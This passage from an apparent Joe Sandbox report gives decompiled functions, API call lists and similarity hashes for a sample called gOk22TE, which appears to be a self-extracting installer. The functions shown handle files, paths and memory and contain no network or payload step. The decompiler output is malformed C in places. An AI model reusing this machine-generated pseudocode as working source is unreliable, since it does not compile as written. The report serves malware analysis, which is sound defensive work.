                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttributesFileItemText
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                                                                • API String ID: 3625706803-256195474
                                                                                                                                                                                                                                                • Opcode ID: 627659d0b0b86bd9f157fede7aae2e531afe7e86a7626ec474f1ee576a40bcdc
                                                                                                                                                                                                                                                • Instruction ID: 6a74f7a0d8011e3e3be5f296a84a21226e159b22aa6c832b8d7258e85f33f5a8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 627659d0b0b86bd9f157fede7aae2e531afe7e86a7626ec474f1ee576a40bcdc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B14126366081068FDB75AE3ED94C6F977E6EB45700F0486E8D8C2D7285DA33DA46C790
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E4C37 Relevance: 4.5, APIs: 3, Instructions: 39timeCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E4C37(signed int __ecx, int __edx, int _a4) {
				struct _FILETIME _v12;
				struct _FILETIME _v20;
				FILETIME* _t14;
				int _t15;
				signed int _t21;

				_t21 = __ecx * 0x18;
				if( *((intOrPtr*)(_t21 + 0x10e8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
					L5:
					return 0;
				} else {
					_t14 =  &_v12;
					_t15 = SetFileTime( *(_t21 + 0x10e8d74), _t14, _t14, _t14); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 1;
				}
			}








                                                                                                                                                                                                                                                0x010e4c40
                                                                                                                                                                                                                                                0x010e4c4a
                                                                                                                                                                                                                                                0x010e4c8d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4c70
                                                                                                                                                                                                                                                0x010e4c70
                                                                                                                                                                                                                                                0x010e4c7e
                                                                                                                                                                                                                                                0x010e4c86
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4c8a

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 010E4C54
                                                                                                                                                                                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 010E4C66
                                                                                                                                                                                                                                                • SetFileTime.KERNELBASE(?,?,?,?), ref: 010E4C7E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2071732420-0
                                                                                                                                                                                                                                                • Opcode ID: a13b8d3601c31b827841d2792b1936887b38dd653b5e53a35ab0e444621f1db7
                                                                                                                                                                                                                                                • Instruction ID: 1738ac42376a1007c5b88f23f4ac824ec6114280dfd98740227646bfae8525a4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a13b8d3601c31b827841d2792b1936887b38dd653b5e53a35ab0e444621f1db7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7DF0967260020DBFABA9DFAACC4CDFB7BEDEB0C644744456BA695C3000E635E524C760
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E487A Relevance: 3.1, APIs: 2, Instructions: 59fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                                                                			E010E487A(CHAR* __ecx, signed int __edx) {
				void* _t7;
				CHAR* _t11;
				long _t18;
				long _t23;

				_t11 = __ecx;
				asm("sbb edi, edi");
				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
				if((__edx & 0x00000100) == 0) {
					asm("sbb esi, esi");
					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
				} else {
					if((__edx & 0x00000400) == 0) {
						asm("sbb esi, esi");
						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
					} else {
						_t23 = 1;
					}
				}
				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
				if(_t7 != 0xffffffff || _t23 == 3) {
					return _t7;
				} else {
					E010E490C(_t11);
					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
				}
			}







                                                                                                                                                                                                                                                0x010e4880
                                                                                                                                                                                                                                                0x010e488c
                                                                                                                                                                                                                                                0x010e4894
                                                                                                                                                                                                                                                0x010e48a0
                                                                                                                                                                                                                                                0x010e48c9
                                                                                                                                                                                                                                                0x010e48ce
                                                                                                                                                                                                                                                0x010e48a2
                                                                                                                                                                                                                                                0x010e48a8
                                                                                                                                                                                                                                                0x010e48b7
                                                                                                                                                                                                                                                0x010e48bc
                                                                                                                                                                                                                                                0x010e48aa
                                                                                                                                                                                                                                                0x010e48ac
                                                                                                                                                                                                                                                0x010e48ac
                                                                                                                                                                                                                                                0x010e48a8
                                                                                                                                                                                                                                                0x010e48de
                                                                                                                                                                                                                                                0x010e48e7
                                                                                                                                                                                                                                                0x010e490b
                                                                                                                                                                                                                                                0x010e48ee
                                                                                                                                                                                                                                                0x010e48f0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4902

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,010E4A23,?,010E4F67,*MEMCAB,00008000,00000180), ref: 010E48DE
                                                                                                                                                                                                                                                • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,010E4F67,*MEMCAB,00008000,00000180), ref: 010E4902
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                • Opcode ID: 8e4e6b6b29f3d006b7d8d7d6208a463827b16478dcbd8406ed0794f20a89c48a
                                                                                                                                                                                                                                                • Instruction ID: 69ab8053d9bca5e0fe377f073cbc630bc70c3822a907f30e8c5a8e4f8130daae
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e4e6b6b29f3d006b7d8d7d6208a463827b16478dcbd8406ed0794f20a89c48a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4D0162A3E115702AF364402A4C8CFFB559CCBD6634F1B0375BEEAE71C1D5585C0481E0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E4AD0 Relevance: 3.0, APIs: 2, Instructions: 47fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E010E4AD0(signed int _a4, void* _a8, long _a12) {
				signed int _t9;
				int _t12;
				signed int _t14;
				signed int _t15;
				void* _t20;
				struct HWND__* _t21;
				signed int _t24;
				signed int _t25;

				_t20 =  *0x10e858c; // 0x26c
				_t9 = E010E3680(_t20);
				if( *0x10e91d8 == 0) {
					_push(_t24);
					_t12 = WriteFile( *(0x10e8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
					if(_t12 != 0) {
						_t25 = _a12;
						if(_t25 != 0xffffffff) {
							_t14 =  *0x10e9400; // 0x2e800
							_t15 = _t14 + _t25;
							 *0x10e9400 = _t15;
							if( *0x10e8184 != 0) {
								_t21 =  *0x10e8584; // 0x0
								if(_t21 != 0) {
									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x10e93f8, 0);
								}
							}
						}
					} else {
						_t25 = _t24 | 0xffffffff;
					}
					return _t25;
				} else {
					return _t9 | 0xffffffff;
				}
			}











                                                                                                                                                                                                                                                0x010e4ad5
                                                                                                                                                                                                                                                0x010e4adb
                                                                                                                                                                                                                                                0x010e4ae7
                                                                                                                                                                                                                                                0x010e4aee
                                                                                                                                                                                                                                                0x010e4b05
                                                                                                                                                                                                                                                0x010e4b0d
                                                                                                                                                                                                                                                0x010e4b14
                                                                                                                                                                                                                                                0x010e4b1a
                                                                                                                                                                                                                                                0x010e4b1c
                                                                                                                                                                                                                                                0x010e4b21
                                                                                                                                                                                                                                                0x010e4b2a
                                                                                                                                                                                                                                                0x010e4b2f
                                                                                                                                                                                                                                                0x010e4b31
                                                                                                                                                                                                                                                0x010e4b39
                                                                                                                                                                                                                                                0x010e4b54
                                                                                                                                                                                                                                                0x010e4b54
                                                                                                                                                                                                                                                0x010e4b39
                                                                                                                                                                                                                                                0x010e4b2f
                                                                                                                                                                                                                                                0x010e4b0f
                                                                                                                                                                                                                                                0x010e4b0f
                                                                                                                                                                                                                                                0x010e4b0f
                                                                                                                                                                                                                                                0x010e4b5e
                                                                                                                                                                                                                                                0x010e4ae9
                                                                                                                                                                                                                                                0x010e4aed
                                                                                                                                                                                                                                                0x010e4aed

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 010E3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 010E369F
                                                                                                                                                                                                                                                  • Part of subcall function 010E3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010E36B2
                                                                                                                                                                                                                                                  • Part of subcall function 010E3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010E36DA
                                                                                                                                                                                                                                                • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 010E4B05
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1084409-0
                                                                                                                                                                                                                                                • Opcode ID: 79a28840dc2ce808149423372b8007b23f28f8ee7b4cfcb18b71ae5eff2f787e
                                                                                                                                                                                                                                                • Instruction ID: 679576c095e4b5bba4113c302947220015081da83ade526100ecf983f585c37a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79a28840dc2ce808149423372b8007b23f28f8ee7b4cfcb18b71ae5eff2f787e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E00184712002019FDB658F6BDC09BA67BD9B744B25F048265FAB9DF1D4CB7A9811CB40
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E658A Relevance: 1.5, APIs: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E658A(char* __ecx, void* __edx, char* _a4) {
				intOrPtr _t4;
				char* _t6;
				char* _t8;
				void* _t10;
				void* _t12;
				char* _t16;
				intOrPtr* _t17;
				void* _t18;
				char* _t19;

				_t16 = __ecx;
				_t10 = __edx;
				_t17 = __ecx;
				_t1 = _t17 + 1; // 0x10e8b3f
				_t12 = _t1;
				do {
					_t4 =  *_t17;
					_t17 = _t17 + 1;
				} while (_t4 != 0);
				_t18 = _t17 - _t12;
				_t2 = _t18 + 1; // 0x10e8b40
				if(_t2 < __edx) {
					_t19 = _t18 + __ecx;
					if(_t19 > __ecx) {
						_t8 = CharPrevA(__ecx, _t19); // executed
						if( *_t8 != 0x5c) {
							 *_t19 = 0x5c;
							_t19 =  &(_t19[1]);
						}
					}
					_t6 = _a4;
					 *_t19 = 0;
					while( *_t6 == 0x20) {
						_t6 = _t6 + 1;
					}
					return E010E16B3(_t16, _t10, _t6);
				}
				return 0x8007007a;
			}












                                                                                                                                                                                                                                                0x010e6592
                                                                                                                                                                                                                                                0x010e6594
                                                                                                                                                                                                                                                0x010e6596
                                                                                                                                                                                                                                                0x010e6598
                                                                                                                                                                                                                                                0x010e6598
                                                                                                                                                                                                                                                0x010e659b
                                                                                                                                                                                                                                                0x010e659b
                                                                                                                                                                                                                                                0x010e659d
                                                                                                                                                                                                                                                0x010e659e
                                                                                                                                                                                                                                                0x010e65a2
                                                                                                                                                                                                                                                0x010e65a4
                                                                                                                                                                                                                                                0x010e65a9
                                                                                                                                                                                                                                                0x010e65b2
                                                                                                                                                                                                                                                0x010e65b6
                                                                                                                                                                                                                                                0x010e65ba
                                                                                                                                                                                                                                                0x010e65c3
                                                                                                                                                                                                                                                0x010e65c5
                                                                                                                                                                                                                                                0x010e65c8
                                                                                                                                                                                                                                                0x010e65c8
                                                                                                                                                                                                                                                0x010e65c3
                                                                                                                                                                                                                                                0x010e65c9
                                                                                                                                                                                                                                                0x010e65cc
                                                                                                                                                                                                                                                0x010e65d2
                                                                                                                                                                                                                                                0x010e65d1
                                                                                                                                                                                                                                                0x010e65d1
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e65dc
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CharPrevA.USER32(010E8B3E,010E8B3F,00000001,010E8B3E,-00000003,?,010E60EC,010E1140,?), ref: 010E65BA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CharPrev
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 122130370-0
                                                                                                                                                                                                                                                • Opcode ID: 311b62462931f9e2efcb58878922fbd33ee24d1c85f4e3b37bd1ffe1c759c1e3
                                                                                                                                                                                                                                                • Instruction ID: c0b904de67f717a9ee651895ea08f9bbcb724c232487cede38f1810eddd7d1c0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 311b62462931f9e2efcb58878922fbd33ee24d1c85f4e3b37bd1ffe1c759c1e3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50F02D333042509FD331051FA88CBA7BFD99BA5150F18059AE9DAC3205CA678C4583A0
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E621E Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 93%
                                                                                                                                                                                                                                                			E010E621E() {
				signed int _v8;
				char _v268;
				signed int _t5;
				void* _t9;
				void* _t13;
				void* _t19;
				void* _t20;
				signed int _t21;

				_t5 =  *0x10e8004; // 0x71a8563c
				_v8 = _t5 ^ _t21;
				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
					0x4f0 = 2;
					_t9 = E010E597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
				} else {
					E010E44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
					 *0x10e9124 = E010E6285();
					_t9 = 0;
				}
				return E010E6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
			}











                                                                                                                                                                                                                                                0x010e6229
                                                                                                                                                                                                                                                0x010e6230
                                                                                                                                                                                                                                                0x010e6247
                                                                                                                                                                                                                                                0x010e626a
                                                                                                                                                                                                                                                0x010e6272
                                                                                                                                                                                                                                                0x010e6249
                                                                                                                                                                                                                                                0x010e6255
                                                                                                                                                                                                                                                0x010e625f
                                                                                                                                                                                                                                                0x010e6264
                                                                                                                                                                                                                                                0x010e6264
                                                                                                                                                                                                                                                0x010e6284

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 010E623F
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                                                                                                                                                                                                                                  • Part of subcall function 010E6285: GetLastError.KERNEL32(010E5BBC), ref: 010E6285
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 381621628-0
                                                                                                                                                                                                                                                • Opcode ID: dcfe451fa124418c4765d3098d065a8058ce17e63e5a48d16372c48ff3e46c03
                                                                                                                                                                                                                                                • Instruction ID: 8530d7e38d47f2aac357c3d35eac177b4d3b8ebdf6aa9413968ed63a4110be84
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dcfe451fa124418c4765d3098d065a8058ce17e63e5a48d16372c48ff3e46c03
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6F0B4B0700209AFD760EB769D09BFE36E8DBA4700F40046AA9C5DB181DD769D408750
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E4B60 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E4B60(signed int _a4) {
				signed int _t9;
				signed int _t15;

				_t15 = _a4 * 0x18;
				if( *((intOrPtr*)(_t15 + 0x10e8d64)) != 1) {
					_t9 = FindCloseChangeNotification( *(_t15 + 0x10e8d74)); // executed
					if(_t9 == 0) {
						return _t9 | 0xffffffff;
					}
					 *((intOrPtr*)(_t15 + 0x10e8d60)) = 1;
					return 0;
				}
				 *((intOrPtr*)(_t15 + 0x10e8d60)) = 1;
				 *((intOrPtr*)(_t15 + 0x10e8d68)) = 0;
				 *((intOrPtr*)(_t15 + 0x10e8d70)) = 0;
				 *((intOrPtr*)(_t15 + 0x10e8d6c)) = 0;
				return 0;
			}





                                                                                                                                                                                                                                                0x010e4b66
                                                                                                                                                                                                                                                0x010e4b74
                                                                                                                                                                                                                                                0x010e4b98
                                                                                                                                                                                                                                                0x010e4ba0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4bac
                                                                                                                                                                                                                                                0x010e4ba4
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4ba4
                                                                                                                                                                                                                                                0x010e4b78
                                                                                                                                                                                                                                                0x010e4b7e
                                                                                                                                                                                                                                                0x010e4b84
                                                                                                                                                                                                                                                0x010e4b8a
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,010E4FA1,00000000), ref: 010E4B98
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2591292051-0
                                                                                                                                                                                                                                                • Opcode ID: 30563ae3cbabb56b0ec2f4166e5f805441b7c4649304728076f5cc0b51cdccd1
                                                                                                                                                                                                                                                • Instruction ID: c7ba197bcc2132f7268aa845f62ac84d73f6853271aa91bbbc14ddbf1f7a6f80
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 30563ae3cbabb56b0ec2f4166e5f805441b7c4649304728076f5cc0b51cdccd1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2DF01231508B09AE4771EE2FCC0469ABBE6AAD52603108A2F96EED2150E7326451EB91
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E66AE Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E66AE(CHAR* __ecx) {
				unsigned int _t1;

				_t1 = GetFileAttributesA(__ecx); // executed
				if(_t1 != 0xffffffff) {
					return  !(_t1 >> 4) & 0x00000001;
				} else {
					return 0;
				}
			}




                                                                                                                                                                                                                                                0x010e66b1
                                                                                                                                                                                                                                                0x010e66ba
                                                                                                                                                                                                                                                0x010e66c7
                                                                                                                                                                                                                                                0x010e66bc
                                                                                                                                                                                                                                                0x010e66be
                                                                                                                                                                                                                                                0x010e66be

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetFileAttributesA.KERNELBASE(?,010E4777,?,010E4E38,?), ref: 010E66B1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                • Opcode ID: 06aa061500e28b9829644265fb07ccb9a3a8fbd95dfbe09d9b81d1dfbdd9bd03
                                                                                                                                                                                                                                                • Instruction ID: ffd0b99994ef6290eae1a293619863751dde55230216a18d774198c9ede6c646
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06aa061500e28b9829644265fb07ccb9a3a8fbd95dfbe09d9b81d1dfbdd9bd03
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46B09276232440866A611636782955628C1A6C563ABE52B91F072C11D4CA3FD546D504
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E4CA0 Relevance: 1.3, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E4CA0(long _a4) {
				void* _t2;

				_t2 = GlobalAlloc(0, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                                                                                0x010e4caa
                                                                                                                                                                                                                                                0x010e4cb1

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000000,?), ref: 010E4CAA
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocGlobal
                                                                                                                                                                                                                                                • String ID:
